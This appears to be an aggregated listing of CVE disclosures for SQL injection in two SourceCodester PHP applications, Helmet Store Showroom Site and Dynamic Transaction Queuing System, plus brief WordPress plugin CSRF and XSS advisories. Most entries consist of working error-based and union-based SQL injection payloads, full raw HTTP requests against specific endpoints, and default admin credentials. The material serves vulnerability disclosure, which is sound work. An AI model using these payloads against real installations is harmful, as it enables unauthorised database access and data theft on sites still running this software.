Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_brand.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_brand

Vulnerability location: /hss/classes/Master.php?f=delete\_brand,id

dbname =hss\_db,length=6

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_brand HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=brands
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46946: bug_report/SQLi-2.md at main · Venus-XATBLab-YT/bug_report

Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_category.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_category

Vulnerability location: /hss/classes/Master.php?f=delete\_category,id

dbname =hss\_db,length=6

\[+\] Payload: id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_category HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/hss/admin/?page=categories
Content-Length: 65
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
id=6' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46947: bug_report/SQLi-1.md at main · Venus-XATBLab-YT/bug_report

Helmet Store Showroom Site v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /classes/Master.php?f=delete_helmet.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/classes/Master.php?f=delete\_helmet

Vulnerability location: /hss/classes/Master.php?f=delete\_helmet,id

dbname =hss\_db,length=6

\[+\] Payload: id=2 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /hss/classes/Master.php?f\=delete\_helmet HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=2 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-46949: bug_report/SQLi-3.md at main · Venus-XATBLab-YT/bug_report

The Mediamatic – Media Library Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on its AJAX actions function. This makes it possible for unauthenticated attackers to change image categories used by the plugin, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2023-0294: sidebar.php in mediamatic/trunk/inc – WordPress Plugin Repository

The Launchpad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of its settings parameters in versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVE-2023-0295: settings.php in launchpad-by-obox/tags/1.0.13/functions – WordPress Plugin Repository

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_uploads.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=delete\_uploads

Vulnerability location: /queuing/admin/ajax.php?action=delete\_uploads, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0) // Leak place ---> id

POST /queuing/admin/ajax.php?action\=delete\_uploads HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)

CVE-2022-46951: bug_report/SQLi-2.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_window.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=delete\_window

Vulnerability location: /queuing/admin/ajax.php?action=delete\_window, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0) // Leak place ---> id

POST /queuing/admin/ajax.php?action\=delete\_window HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)

CVE-2022-46950: bug_report/SQLi-1.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/manage_user.php.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/manage\_user.php?id=

Vulnerability location: /queuing/admin/manage\_user.php?id=, id

dbname =queuing\_db

\[+\] Payload: /queuing/admin/manage\_user.php?id=-1%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /queuing/admin/manage\_user.php?id\=\-1%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close

CVE-2022-46956: bug_report/SQLi-5.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=save_window.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=save\_window

Vulnerability location: /queuing/admin/ajax.php?action=save\_window, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)&transaction\_id=1&name=Window 1 // Leak place ---> id

POST /queuing/admin/ajax.php?action\=save\_window HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)&transaction\_id=1&name=Window 1

CVE-2022-46953: bug_report/SQLi-4.md at main · Venus-XATBLab-YT/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/ajax.php?action=delete_user.

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

Vulnerability Discoverer: Yang Tao, TBLab of Venustech

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=delete\_user

Vulnerability location: /queuing/admin/ajax.php?action=delete\_user, id

dbname =queuing\_db

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0) // Leak place ---> id

POST /queuing/admin/ajax.php?action\=delete\_user HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)

Tag

#php